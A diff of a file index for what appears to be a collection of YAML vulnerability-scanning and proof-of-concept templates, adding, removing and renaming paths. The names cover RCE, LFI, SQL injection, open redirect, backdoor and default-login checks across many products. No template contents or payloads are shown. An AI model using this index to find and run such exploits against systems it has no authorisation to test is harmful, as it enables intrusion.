+./poc/drupal/drupal-user-enum-redirect.yaml ./poc/drupal/drupal-workflow.yaml ./poc/drupal/drupal.yaml ./poc/drupal/drupal_module-acl-arbitrary-php-code-execution.yaml @@ -29256,6 +29279,7 @@ ./poc/elk/elasticsearch-5-version.yaml ./poc/elk/elasticsearch-7193.yaml ./poc/elk/elasticsearch-7194.yaml +./poc/elk/elasticsearch-7195.yaml ./poc/elk/elasticsearch-7196.yaml ./poc/elk/elasticsearch-7197.yaml ./poc/elk/elasticsearch-cluster-health.yaml @@ -29276,7 +29300,6 @@ ./poc/elk/elasticsearch-sql-client-detect.yaml ./poc/elk/elasticsearch-unauth.yml ./poc/elk/elasticsearch-unauthorized-access.yaml -./poc/elk/elasticsearch.yaml ./poc/elk/elasticsearch.yml ./poc/elk/elasticsearch5-log4j-rce.yaml ./poc/elk/exposed-elasticsearch.yaml @@ -29352,10 +29375,10 @@ ./poc/exposed/ambari-exposure-294.yaml ./poc/exposed/ambari-exposure-295.yaml ./poc/exposed/ambari-exposure.yaml -./poc/exposed/android-debug-database-exposed-312.yaml ./poc/exposed/android-debug-database-exposed-313.yaml ./poc/exposed/android-debug-database-exposed-314.yaml ./poc/exposed/android-debug-database-exposed-315.yaml +./poc/exposed/android-debug-database-exposed.yaml ./poc/exposed/ansible-config-disclosure-325.yaml ./poc/exposed/ansible-config-disclosure-326.yaml ./poc/exposed/ansible-config-disclosure.yaml @@ -29382,9 +29405,9 @@ ./poc/exposed/aspnetmvc-version-disclosure.yaml ./poc/exposed/atlassian-jira-info-disclosure.yaml ./poc/exposed/atom-sync-exposure.yaml -./poc/exposed/avtech-dvr-exposure-614.yaml ./poc/exposed/avtech-dvr-exposure-615.yaml ./poc/exposed/avtech-dvr-exposure-616.yaml +./poc/exposed/avtech-dvr-exposure-617.yaml ./poc/exposed/avtech-dvr-exposure.yaml ./poc/exposed/avtech-password-disclosure.yaml ./poc/exposed/axiom-digitalocean-key-exposure-665.yaml @@ -29542,7 +29565,7 @@ ./poc/exposed/exposed-docker-api-1.yaml ./poc/exposed/exposed-docker-api-2.yaml ./poc/exposed/exposed-docker-api-7299.yaml -./poc/exposed/exposed-docker-api-7300.yaml +./poc/exposed/exposed-docker-api.yaml ./poc/exposed/exposed-dockerd.yaml ./poc/exposed/exposed-elasticsearch.yaml ./poc/exposed/exposed-env-js.yaml @@ -29583,9 +29606,9 @@ ./poc/exposed/exposed-kibana.yaml ./poc/exposed/exposed-merge-metadata-servlet.yaml ./poc/exposed/exposed-mysql-initial-7321.yaml -./poc/exposed/exposed-mysql-initial-7322.yaml ./poc/exposed/exposed-mysql-initial-7323.yaml ./poc/exposed/exposed-mysql-initial-7324.yaml +./poc/exposed/exposed-mysql-initial.yaml ./poc/exposed/exposed-nomad-7325.yaml ./poc/exposed/exposed-nomad-7326.yaml ./poc/exposed/exposed-nomad-7327.yaml @@ -29606,13 +29629,13 @@ ./poc/exposed/exposed-redis-7338.yaml ./poc/exposed/exposed-redis-7339.yaml ./poc/exposed/exposed-redis.yaml +./poc/exposed/exposed-service-now-7340.yaml ./poc/exposed/exposed-service-now-7341.yaml ./poc/exposed/exposed-service-now-7343.yaml -./poc/exposed/exposed-service-now.yaml ./poc/exposed/exposed-sharepoint-list-7344.yaml +./poc/exposed/exposed-sharepoint-list-7345.yaml ./poc/exposed/exposed-sharepoint-list-7346.yaml ./poc/exposed/exposed-sharepoint-list-7347.yaml -./poc/exposed/exposed-sharepoint-list.yaml ./poc/exposed/exposed-sonarqube.yaml ./poc/exposed/exposed-sqlite-manager-1.yaml ./poc/exposed/exposed-sqlite-manager-2.yaml @@ -29629,7 +29652,7 @@ ./poc/exposed/exposed-symfony-profiler.yaml ./poc/exposed/exposed-user-info-error-messages (2).yaml ./poc/exposed/exposed-vscode-7356.yaml -./poc/exposed/exposed-vscode-7357.yaml +./poc/exposed/exposed-vscode.yaml ./poc/exposed/exposed-webalizer-7358.yaml ./poc/exposed/exposed-webalizer-7359.yaml ./poc/exposed/exposed-webalizer-7360.yaml @@ -29656,7 +29679,7 @@ ./poc/exposed/firebase-messaging-sw-js-exposure.yaml ./poc/exposed/flink-exposure-7509.yaml ./poc/exposed/flink-exposure-7510.yaml -./poc/exposed/flink-exposure-7511.yaml +./poc/exposed/flink-exposure.yaml ./poc/exposed/ftp-credentials-exposure-7567.yaml ./poc/exposed/ftp-credentials-exposure-7568.yaml ./poc/exposed/ftp-credentials-exposure.yaml @@ -29761,7 +29784,7 @@ ./poc/exposed/idea-logs-exposure.yaml ./poc/exposed/iis-internal-ip-disclosure-8148.yaml ./poc/exposed/iis-internal-ip-disclosure-8149.yaml -./poc/exposed/iis-internal-ip-disclosure.yaml +./poc/exposed/iis-internal-ip-disclosure-8150.yaml ./poc/exposed/information-disclosure-in-js-files.yaml ./poc/exposed/iotawatt-app-exposure-8187.yaml ./poc/exposed/iotawatt-app-exposure.yaml @@ -29886,7 +29909,7 @@ ./poc/exposed/pmb-local-file-disclosure-9617.yaml ./poc/exposed/pmb-local-file-disclosure-9618.yaml ./poc/exposed/pmb-local-file-disclosure-9619.yaml -./poc/exposed/pmb-local-file-disclosure.yaml +./poc/exposed/pmb-local-file-disclosure-9620.yaml ./poc/exposed/postman-api-key-disclosure.yaml ./poc/exposed/private-key-exposure-9654.yaml ./poc/exposed/private-key-exposure.yaml @@ -30023,6 +30046,7 @@ ./poc/exposed/thumbs-db-disclosure-10762.yaml ./poc/exposed/thumbs-db-disclosure-10763.yaml ./poc/exposed/thumbs-db-disclosure.yaml +./poc/exposed/titannit-web-exposure.yaml ./poc/exposed/tomcat-cookie-exposed.yaml ./poc/exposed/tomcat-exposed-docs.yaml ./poc/exposed/tomcat-server-xml-disclosure.yaml @@ -30144,7 +30168,7 @@ ./poc/ftp/Wordpress-MiwoFTP_Plugins-ArbitraryFileDownload.yaml ./poc/ftp/crush-ftp-detect-1270.yaml ./poc/ftp/crush-ftp-detect-1271.yaml -./poc/ftp/crush-ftp-detect.yaml +./poc/ftp/crush-ftp-detect-1272.yaml ./poc/ftp/crush-ftp-login-1274.yaml ./poc/ftp/crush-ftp-login-1275.yaml ./poc/ftp/crush-ftp-login.yaml @@ -30223,8 +30247,8 @@ ./poc/ftp/wanhuOA-download-ftp.yaml ./poc/ftp/web-ftp-detect-11135.yaml ./poc/ftp/web-ftp-detect-11136.yaml +./poc/ftp/web-ftp-detect-11137.yaml ./poc/ftp/web-ftp-detect-11138.yaml -./poc/ftp/web-ftp-detect.yaml ./poc/ftp/wing-ftp-server.yaml ./poc/ftp/wordpress-updraftplus-pem-key-11325.yaml ./poc/ftp/wordpress-updraftplus-pem-key-11326.yaml @@ -30243,8 +30267,8 @@ ./poc/fuzz/alfabet-param-fuzzer.yaml ./poc/fuzz/blind_xss_fuzz_param.yaml ./poc/fuzz/cache-poisoning-fuzz.yaml +./poc/fuzz/fuzz-mode.yaml ./poc/fuzz/fuzz-oauth.yaml -./poc/fuzz/fuzz-query.yaml ./poc/fuzz/fuzz-type.yaml ./poc/fuzz/fuzz-xxe.yaml ./poc/fuzz/fuzzing-xss-get-params-html-attribute-injection.yaml @@ -30294,7 +30318,7 @@ ./poc/gcloud/gcp-firebase-app-enum.yaml ./poc/gcloud/gcp-firebase-rtdb-enum.yaml ./poc/gcloud/gcp-service-account-11851.yaml -./poc/gcloud/gcp-service-account-7575.yaml +./poc/gcloud/gcp-service-account.yaml ./poc/gcloud/print-google-cloud-print-gcp-woocommerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/gcloud/springcloud-cve-2019-3799.yaml ./poc/gcloud/springcloud-cve-2019-3799.yml @@ -30310,8 +30334,8 @@ ./poc/git/api-digitalocean.yaml ./poc/git/api-github-429.yaml ./poc/git/api-github.yaml -./poc/git/api-gitlab-430.yaml ./poc/git/api-gitlab-431.yaml +./poc/git/api-gitlab.yml ./poc/git/axiom-digitalocean-key-exposure-665.yaml ./poc/git/axiom-digitalocean-key-exposure-666.yaml ./poc/git/axiom-digitalocean-key-exposure-667.yaml @@ -30404,7 +30428,7 @@ ./poc/git/git-search-logs-7712.yaml ./poc/git/git-submodule-rce.yaml ./poc/git/git-urls.yaml -./poc/git/git-web-interface-7713.yaml +./poc/git/git-web-interface.yaml ./poc/git/git_scan.yml ./poc/git/gitblit-panel.yaml ./poc/git/gitbook-detect-7623.yaml @@ -30436,7 +30460,7 @@ ./poc/git/github-enterprise-detect.yaml ./poc/git/github-gemfile-files-1.yaml ./poc/git/github-gemfile-files-2.yaml -./poc/git/github-gemfile-files-7653.yaml +./poc/git/github-gemfile-files-7652.yaml ./poc/git/github-gemfile-files.yaml ./poc/git/github-oauth-access.yaml ./poc/git/github-oauth-token.yaml @@ -30708,7 +30732,6 @@ ./poc/google/google-placesphoto.yaml ./poc/google/google-playablelocations.yaml ./poc/google/google-routetotraveled.yaml -./poc/google/google-secrets.yaml ./poc/google/google-seo-author-snippets-c7ef7a54325272053bde6fd4c9883ada.yaml ./poc/google/google-seo-author-snippets-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/google/google-seo-author-snippets-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -30955,13 +30978,13 @@ ./poc/header/http-cache-header.yaml ./poc/header/http-cors-header.yaml ./poc/header/http-csp-header.yaml +./poc/header/http-hsts-header.yaml ./poc/header/http-missing-security-headers-8058.yaml ./poc/header/http-missing-security-headers.yaml -./poc/header/http-xframe-header.yaml ./poc/header/insert-headers-and-footers.yaml ./poc/header/jenkins-headers-detect.yaml ./poc/header/jfrog-version-header.yaml -./poc/header/log4j-all-headers.yaml +./poc/header/log4j-header.yaml ./poc/header/maxforwards-headers-detect.yaml ./poc/header/missing-hsts-header.yaml ./poc/header/null-auth-header-auth-bypass.yaml @@ -30980,7 +31003,6 @@ ./poc/header/x-recruiting-header.yaml ./poc/header/xss-deprecated-header.yaml ./poc/header/xss_in_headers.yaml -./poc/http/CL-TE-http-smuggling.yaml ./poc/http/Cmseasy-Http-Head-sqli.yaml ./poc/http/HTTP - Cookies.yaml ./poc/http/HTTP - Directory indexing.yaml @@ -31009,11 +31031,12 @@ ./poc/http/basic_http.yaml ./poc/http/cl-http.yaml ./poc/http/cl-te-http-request-smuggling.yaml +./poc/http/cl-te-http-smuggling.yaml ./poc/http/crystal-live-http-server-lfi.yaml ./poc/http/default-ibm-http-server-6856.yaml ./poc/http/default-ibm-http-server.yaml +./poc/http/default-lighttpd-page-6866.yaml ./poc/http/default-lighttpd-page-6867.yaml -./poc/http/default-lighttpd-page.yaml ./poc/http/default-lighttpd-placeholder-page.yaml ./poc/http/detect-dns-over-https-6970.yaml ./poc/http/detect-dns-over-https.yaml @@ -31028,18 +31051,18 @@ ./poc/http/http-etcd-unauthenticated-api-data-leak-8056.yaml ./poc/http/http-etcd-unauthenticated-api-data-leak-8057.yaml ./poc/http/http-etcd-unauthenticated-api-data-leak.yaml +./poc/http/http-hsts-header.yaml ./poc/http/http-missing-security-headers-8058.yaml ./poc/http/http-missing-security-headers.yaml ./poc/http/http-multiple-matcher-condition.yaml ./poc/http/http-multiple-matcher.yaml ./poc/http/http-paths.yaml -./poc/http/http-raw.yaml +./poc/http/http-raw-multiple.yaml ./poc/http/http-trace.yaml ./poc/http/http-username-password.yaml ./poc/http/http-value-share-template-1.yaml ./poc/http/http-value-share-template-2.yaml ./poc/http/http-verb-tampering.yaml -./poc/http/http-xframe-header.yaml ./poc/http/httpbin-detection.yaml ./poc/http/httpbin-open-redirect-8047.yaml ./poc/http/httpbin-open-redirect-8048.yaml @@ -31058,6 +31081,7 @@ ./poc/http/httpd-config.yaml ./poc/http/httpfs.yaml ./poc/http/httponly-cookie-detect.yaml +./poc/http/https-to-http-redirect.yaml ./poc/http/http基本认证.yaml ./poc/http/huawei-auth-http-server-fileread.yaml ./poc/http/ibm-http-server-8094.yaml @@ -31158,7 +31182,7 @@ ./poc/ibm/ibm-mqseries-default-login-8107.yaml ./poc/ibm/ibm-mqseries-default-login-8108.yaml ./poc/ibm/ibm-mqseries-default-login.yaml -./poc/ibm/ibm-mqseries-web-console.yaml +./poc/ibm/ibm-mqseries-web-console-8109.yaml ./poc/ibm/ibm-mqseries.yaml ./poc/ibm/ibm-note-login-1.yaml ./poc/ibm/ibm-note-login-2.yaml @@ -31181,7 +31205,7 @@ ./poc/ibm/ibm-signup-exposure-8120.yaml ./poc/ibm/ibm-spectrum-computing.yaml ./poc/ibm/ibm-sterling-detect-8121.yaml -./poc/ibm/ibm-sterling-detect.yaml +./poc/ibm/ibm-sterling-detect-8122.yaml ./poc/ibm/ibm-storage-default-credential-8123.yaml ./poc/ibm/ibm-storage-default-credential-8124.yaml ./poc/ibm/ibm-storage-default-credential.yaml @@ -31495,9 +31519,9 @@ ./poc/java/jboss.yaml ./poc/java/jetty-cve-2021-28164.yml ./poc/java/jetty-information-disclosure.yaml -./poc/java/jetty-showcontexts-enable-8295.yaml ./poc/java/jetty-showcontexts-enable-8296.yaml ./poc/java/jetty-showcontexts-enable-8297.yaml +./poc/java/jetty-showcontexts-enable.yaml ./poc/java/jetty-workflow.yaml ./poc/java/jetty.yaml ./poc/java/jinfornet-jreport-lfi-8307.yaml @@ -31543,6 +31567,7 @@ ./poc/java/shiro-detect-10196.yaml ./poc/java/shiro-detect-10197.yaml ./poc/java/shiro-detect.yaml +./poc/java/spring-boot-actuators.yaml ./poc/java/spring-boot-admin.yaml ./poc/java/spring-cloud-cve-2020-5405.yml ./poc/java/spring-cloud-cve-2020-5410.yml @@ -31592,7 +31617,6 @@ ./poc/java/springboot-configprops-10445.yaml ./poc/java/springboot-configprops-2.yaml ./poc/java/springboot-configprops.yaml -./poc/java/springboot-detect.yaml ./poc/java/springboot-dump-1.yaml ./poc/java/springboot-dump-10446.yaml ./poc/java/springboot-dump-10447.yaml @@ -31601,10 +31625,10 @@ ./poc/java/springboot-env-1.yaml ./poc/java/springboot-env-10448.yaml ./poc/java/springboot-env-10449.yaml -./poc/java/springboot-env-10450.yaml ./poc/java/springboot-env-10451.yaml ./poc/java/springboot-env-2.yaml ./poc/java/springboot-env-unauth.yml +./poc/java/springboot-env.yaml ./poc/java/springboot-exposures.yaml ./poc/java/springboot-features.yaml ./poc/java/springboot-flyway.yaml @@ -31845,8 +31869,8 @@ ./poc/javascript/aem-querybuilder-json-servlet-183.yaml ./poc/javascript/aem-querybuilder-json-servlet-184.yaml ./poc/javascript/aem-querybuilder-json-servlet-185.yaml +./poc/javascript/aem-querybuilder-json-servlet-186.yaml ./poc/javascript/aem-querybuilder-json-servlet-187.yaml -./poc/javascript/aem-querybuilder-json-servlet.yaml ./poc/javascript/alibaba-fastjson.yaml ./poc/javascript/angular-json.yaml ./poc/javascript/api-jsonbin.yaml @@ -31856,8 +31880,8 @@ ./poc/javascript/async-javascript-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/javascript/auth-js.yaml ./poc/javascript/bower-json-768.yaml -./poc/javascript/bower-json-769.yaml ./poc/javascript/bower-json-770.yaml +./poc/javascript/bower-json.yaml ./poc/javascript/config-js.yaml ./poc/javascript/config-json.yaml ./poc/javascript/css-javascript-toolbox-8ddb99e77dfdeece62e0ab449bff801f.yaml @@ -32019,7 +32043,7 @@ ./poc/javascript/landray-oa-custom-jsp-rce.yaml ./poc/javascript/landray-oa-datajson-rce.yaml ./poc/javascript/liferay-jsonws.yaml -./poc/javascript/log4jshell.yaml +./poc/javascript/log4jshell-detect.yaml ./poc/javascript/magicflu-mailupdate-jsp-fileupload.yaml ./poc/javascript/mojarra-jsf.yaml ./poc/javascript/nextjs-cve-2017-16877.yml @@ -32727,13 +32751,13 @@ ./poc/local_file_inclusion/targa-camera-lfi-10653.yaml ./poc/local_file_inclusion/targa-camera-lfi-10654.yaml ./poc/local_file_inclusion/targa-camera-lfi.yaml +./poc/local_file_inclusion/thinkcmf-lfi (copy 1).yaml ./poc/local_file_inclusion/thinkcmf-lfi-1.yaml ./poc/local_file_inclusion/thinkcmf-lfi-10721.yaml ./poc/local_file_inclusion/thinkcmf-lfi-10722.yaml ./poc/local_file_inclusion/thinkcmf-lfi-10723.yaml ./poc/local_file_inclusion/thinkcmf-lfi-10724.yaml ./poc/local_file_inclusion/thinkcmf-lfi-2.yaml -./poc/local_file_inclusion/thinkcmf-lfi.yaml ./poc/local_file_inclusion/thinkcmf-lfi.yml ./poc/local_file_inclusion/thinkcmflfi.yaml ./poc/local_file_inclusion/thinkphp6-lang-lfi.yaml @@ -32756,15 +32780,15 @@ ./poc/local_file_inclusion/wapples-firewall-lfi.yaml ./poc/local_file_inclusion/webp-server-go-lfi.yaml ./poc/local_file_inclusion/windows-lfi-fuzz.yaml +./poc/local_file_inclusion/wordpress-LFI.yaml ./poc/local_file_inclusion/wordpress-ext-adaptive-images-lfi.yml -./poc/local_file_inclusion/wordpress-lfi(1).yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11346.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11347.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11348.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11349.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11350.yaml +./poc/local_file_inclusion/wordpress-wordfence-lfi-11351.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11352.yaml -./poc/local_file_inclusion/wordpress-wordfence-lfi.yaml ./poc/local_file_inclusion/wp-brandfolder-plugin-lfi.yaml ./poc/local_file_inclusion/wp-church-admin-lfi.yaml ./poc/local_file_inclusion/wp-javospot-lfi-11480.yaml @@ -32796,7 +32820,7 @@ ./poc/local_file_inclusion/wp-simple-fields-lfi-11568.yaml ./poc/local_file_inclusion/wp-simple-fields-lfi-11569.yaml ./poc/local_file_inclusion/wp-simple-fields-lfi-11570.yaml -./poc/local_file_inclusion/wp-simple-fields-lfi.yaml +./poc/local_file_inclusion/wp-simple-fields-lfi-11571.yaml ./poc/local_file_inclusion/wp-site-editor-lfi.yaml ./poc/local_file_inclusion/wp-socialfit-xss-11577.yaml ./poc/local_file_inclusion/wp-socialfit-xss-11578.yaml @@ -32805,8 +32829,8 @@ ./poc/local_file_inclusion/wp-socialfit-xss-11581.yaml ./poc/local_file_inclusion/wp-socialfit-xss-11582.yaml ./poc/local_file_inclusion/wp-socialfit-xss.yaml +./poc/local_file_inclusion/wp-spot-premium-lfi-11583.yaml ./poc/local_file_inclusion/wp-spot-premium-lfi-11584.yaml -./poc/local_file_inclusion/wp-spot-premium-lfi.yaml ./poc/local_file_inclusion/wp-theme-diarise-lfi.yaml ./poc/local_file_inclusion/wp-tinymce-lfi-11589.yaml ./poc/local_file_inclusion/wp-tinymce-lfi-11590.yaml @@ -32936,6 +32960,7 @@ ./poc/microsoft/DocCMS-keyword-sqli.yaml ./poc/microsoft/Dotnetcms-SQLi.yaml ./poc/microsoft/EmpireCMS-list-sqli.yaml +./poc/microsoft/EmpireCMS-rate-sqli.yaml ./poc/microsoft/Fangweicms-SQLi.yaml ./poc/microsoft/HIKVISION-iVms-read-download.token.yaml ./poc/microsoft/HIKVISION-iVms-upload-upload.action.yaml @@ -33002,13 +33027,13 @@ ./poc/microsoft/aikcms_v2-xss.yaml ./poc/microsoft/aikcms_v2_notice_edit_sqli.yaml ./poc/microsoft/aims-password-mgmt-client-218.yaml -./poc/microsoft/aims-password-mgmt-client-219.yaml ./poc/microsoft/aims-password-mgmt-client-220.yaml ./poc/microsoft/aims-password-mgmt-client-221.yaml +./poc/microsoft/aims-password-mgmt-client.yaml ./poc/microsoft/aims-password-portal-222.yaml ./poc/microsoft/aims-password-portal-223.yaml ./poc/microsoft/aims-password-portal-224.yaml -./poc/microsoft/aims-password-portal-225.yaml +./poc/microsoft/aims-password-portal.yaml ./poc/microsoft/alibaba-group-dms.yaml ./poc/microsoft/amss-sqli.yaml ./poc/microsoft/anecms.yaml @@ -33084,8 +33109,8 @@ ./poc/microsoft/caldera-forms-pro-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/microsoft/caldera-forms-pro-ec78cb6c2fad9770f382d45cdfc4ad8c.yaml ./poc/microsoft/caldera-forms-pro-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/microsoft/call-break-cms-838.yaml ./poc/microsoft/call-break-cms-839.yaml -./poc/microsoft/call-break-cms-840.yaml ./poc/microsoft/call-break-cms.yaml ./poc/microsoft/cforms2-b1ba17d42577f37a7bc40f58361b25b0.yaml ./poc/microsoft/cforms2-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -33100,9 +33125,9 @@ ./poc/microsoft/chamilo-lms-xss.yaml ./poc/microsoft/chamsko.yaml ./poc/microsoft/chanzhicms.yaml -./poc/microsoft/cisco-systems-login-973.yaml ./poc/microsoft/cisco-systems-login-974.yaml ./poc/microsoft/cisco-systems-login-975.yaml +./poc/microsoft/cisco-systems-login.yaml ./poc/microsoft/cms-commander-client-7a6bcc733acf1cf925e3c17432a790dd.yaml ./poc/microsoft/cms-commander-client-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/microsoft/cms-commander-client-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -33132,9 +33157,9 @@ ./poc/microsoft/corero-smartwall-cms.yaml ./poc/microsoft/couchcms-cve-2018-7662.yml ./poc/microsoft/craft-cms-detect-1246.yaml -./poc/microsoft/craft-cms-detect-1247.yaml ./poc/microsoft/craft-cms-detect-1248.yaml -./poc/microsoft/craftcms-admin-panel.yaml +./poc/microsoft/craft-cms-detect.yaml +./poc/microsoft/craftcms-admin-panel-1245.yaml ./poc/microsoft/craftcms-seomatic-cve-2020-9757-rce.yml ./poc/microsoft/crhms-medical-insurance-decision-support-system.yaml ./poc/microsoft/crhms-medical-insurance-review-system.yaml @@ -33201,7 +33226,7 @@ ./poc/microsoft/docebolms.yaml ./poc/microsoft/dotcms-admin-panel-7085.yaml ./poc/microsoft/dotcms-admin-panel-7086.yaml -./poc/microsoft/dotcms-admin-panel.yaml +./poc/microsoft/dotcms-admin-panel-7087.yaml ./poc/microsoft/dotcms-version-detect.yaml ./poc/microsoft/dotnetcms-sqli-7089.yaml ./poc/microsoft/dotnetcms-sqli.yaml @@ -33230,7 +33255,6 @@ ./poc/microsoft/ektron-cms.yaml ./poc/microsoft/elite_cms.yaml ./poc/microsoft/empirecms-detect.yaml -./poc/microsoft/empirecms-rate-sqli.yaml ./poc/microsoft/empirecms-xss-7218.yaml ./poc/microsoft/empirecms-xss-7219.yaml ./poc/microsoft/empirecms-xss-7220.yaml @@ -33376,12 +33400,12 @@ ./poc/microsoft/kevinlab-bems-sqli-8457.yaml ./poc/microsoft/kevinlab-bems-sqli-8458.yaml ./poc/microsoft/kevinlab-bems-sqli-8459.yaml -./poc/microsoft/kevinlab-bems-sqli.yaml +./poc/microsoft/kevinlab-bems-sqli-8460.yaml ./poc/microsoft/kevinlab-hems-backdoor-8463.yaml ./poc/microsoft/kevinlab-hems-backdoor-8464.yaml ./poc/microsoft/kevinlab-hems-backdoor-8465.yaml ./poc/microsoft/kevinlab-hems-backdoor-8466.yaml -./poc/microsoft/kevinlab-hems-backdoor-8467.yaml +./poc/microsoft/kevinlab-hems-backdoor.yaml ./poc/microsoft/kiwitcms-login-8496.yaml ./poc/microsoft/kiwitcms-login-8497.yaml ./poc/microsoft/kiwitcms-login.yaml @@ -33403,7 +33427,7 @@ ./poc/microsoft/lotuscms-rce-8650.yaml ./poc/microsoft/lotuscms-rce-8651.yaml ./poc/microsoft/lotuscms-rce-8652.yaml -./poc/microsoft/lotuscms-rce.yaml +./poc/microsoft/lotuscms-rce-8653.yaml ./poc/microsoft/lws-sms-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/microsoft/lws-sms-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/microsoft/maccms-rce.yml @@ -33675,7 +33699,7 @@ ./poc/microsoft/seeddms-default-password.yaml ./poc/microsoft/seeddms-detect-10129.yaml ./poc/microsoft/seeddms-detect-10130.yaml -./poc/microsoft/seeddms-detect-10131.yaml +./poc/microsoft/seeddms-detect.yaml ./poc/microsoft/seeddms-panel.yaml ./poc/microsoft/self-contained-with-params.yaml ./poc/microsoft/sevone-nms-network-manager.yaml @@ -33889,7 +33913,7 @@ ./poc/microsoft/zzzcms.yaml ./poc/mongodb/alibaba-mongoshake-unauth-268.yaml ./poc/mongodb/alibaba-mongoshake-unauth-269.yaml -./poc/mongodb/alibaba-mongoshake-unauth.yaml +./poc/mongodb/alibaba-mongoshake-unauth-270.yaml ./poc/mongodb/dionaea-mongodb-honeypot-detection.yaml ./poc/mongodb/mongo-express-cve-2019-10758.yml ./poc/mongodb/mongo-express-web-gui.yaml @@ -33922,7 +33946,7 @@ ./poc/mongodb/rockmongo-default-login-9897.yaml ./poc/mongodb/rockmongo-default-login-9898.yaml ./poc/mongodb/rockmongo-default-login-9899.yaml -./poc/mongodb/rockmongo-default-login.yaml +./poc/mongodb/rockmongo-default-login-9900.yaml ./poc/mongodb/rockmongo-default-password.yml ./poc/mongodb/rockmongo-xss-9901.yaml ./poc/mongodb/rockmongo-xss-9902.yaml @@ -33941,9 +33965,9 @@ ./poc/mysql/dionaea-mysql-honeypot-detect.yaml ./poc/mysql/e-cology-e-office-mysql-config-leak.yaml ./poc/mysql/exposed-mysql-initial-7321.yaml -./poc/mysql/exposed-mysql-initial-7322.yaml ./poc/mysql/exposed-mysql-initial-7323.yaml ./poc/mysql/exposed-mysql-initial-7324.yaml +./poc/mysql/exposed-mysql-initial.yaml ./poc/mysql/mysql-detect.yaml ./poc/mysql/mysql-dump-files.yaml ./poc/mysql/mysql-my-cnf-disclosure.yaml @@ -34153,14 +34177,14 @@ ./poc/open_redirect/aspnuke-openredirect-556.yaml ./poc/open_redirect/aspnuke-openredirect-557.yaml ./poc/open_redirect/aspnuke-openredirect.yaml +./poc/open_redirect/attitude-theme-open-redirect-586.yaml ./poc/open_redirect/attitude-theme-open-redirect-587.yaml ./poc/open_redirect/attitude-theme-open-redirect-588.yaml -./poc/open_redirect/attitude-theme-open-redirect.yaml ./poc/open_redirect/attitude-wp-theme-open-redirect.yaml ./poc/open_redirect/aws-redirect-651.yaml -./poc/open_redirect/aws-redirect-652.yaml ./poc/open_redirect/aws-redirect-653.yaml ./poc/open_redirect/aws-redirect-654.yaml +./poc/open_redirect/aws-redirect.yaml ./poc/open_redirect/bitrix-open-redirect-1.yaml ./poc/open_redirect/bitrix-open-redirect-10.yaml ./poc/open_redirect/bitrix-open-redirect-11.yaml @@ -34195,9 +34219,9 @@ ./poc/open_redirect/drupal-user-enum-redirect-2.yaml ./poc/open_redirect/drupal-user-enum-redirect-3.yaml ./poc/open_redirect/drupal-user-enum-redirect-4.yaml -./poc/open_redirect/drupal-user-enum-redirect-7112.yaml ./poc/open_redirect/drupal-user-enum-redirect-7113.yaml ./poc/open_redirect/drupal-user-enum-redirect-7115.yaml +./poc/open_redirect/drupal-user-enum-redirect.yaml ./poc/open_redirect/drupal_module-anonymousredirect-unsupported.yaml ./poc/open_redirect/drupal_module-elf-open-redirect-vulnerability.yaml ./poc/open_redirect/drupal_module-pubdlcnt-open-redirect-vulnerability.yaml @@ -34227,6 +34251,7 @@ ./poc/open_redirect/httpbin-open-redirect-8049.yaml ./poc/open_redirect/httpbin-open-redirect.yaml ./poc/open_redirect/httpbin-open-redirect.yml +./poc/open_redirect/https-to-http-redirect.yaml ./poc/open_redirect/icewarp-open-redirect.yaml ./poc/open_redirect/icewarp-openredirects.yaml ./poc/open_redirect/kentico-open-redirect-8448.yaml @@ -34527,7 +34552,7 @@ ./poc/oracle/oracle-iplanet-web-server-9392.yaml ./poc/oracle/oracle-iplanet-web-server-9393.yaml ./poc/oracle/oracle-iplanet-web-server.yaml -./poc/oracle/oracle-oam-xss(1).yaml +./poc/oracle/oracle-oam-xss.yaml ./poc/oracle/oracle-opera.yaml ./poc/oracle/oracle-people-enterprise-9394.yaml ./poc/oracle/oracle-people-enterprise-9395.yaml @@ -34704,8 +34729,6 @@ ./poc/other/AVideo-user-leakge.yaml ./poc/other/Actuator.yaml ./poc/other/Alibaba-Anyproxy-fileRead.yaml -./poc/other/Anni-fileDownload.yaml -./poc/other/AolynkBR304-weakPass.yaml ./poc/other/Apexis-IPCAM-info.yaml ./poc/other/Application_level_dos.yaml ./poc/other/Arucer.yaml @@ -34797,6 +34820,7 @@ ./poc/other/MobileIron.yaml ./poc/other/Mpsecfileread.yaml ./poc/other/NCP.yaml +./poc/other/NETSurveillance-fileRead.yaml ./poc/other/NGFW4000-DeafultPass.yaml ./poc/other/NJE.yaml ./poc/other/NULL.yaml @@ -34828,7 +34852,6 @@ ./poc/other/RedSteel-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/RedSteel-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/Reflection Test.yaml -./poc/other/Ruijie-EG-passLeak.yaml ./poc/other/Ruijie_EXCU_SHELL.yaml ./poc/other/S2-001.yaml ./poc/other/S2-003.yaml @@ -34850,7 +34873,6 @@ ./poc/other/SecurestackWorkflow.yaml ./poc/other/Seeyou-ReportServer.yaml ./poc/other/SharpTV.yaml -./poc/other/SiteCore.yaml ./poc/other/Socks4.yaml ./poc/other/Socks5.yaml ./poc/other/SponIpIntercom-File-Read.yaml @@ -34861,6 +34883,7 @@ ./poc/other/TLS-PSK.yaml ./poc/other/Taskfile.yml ./poc/other/Tenda 路由器 DownloadCfg 信息泄露漏洞.yaml +./poc/other/Tenda-leakage.yaml ./poc/other/TerminalServer.yaml ./poc/other/TongDA-OA_file_download.yaml ./poc/other/Tongda-OA-FileInclude.yaml @@ -35177,10 +35200,10 @@ 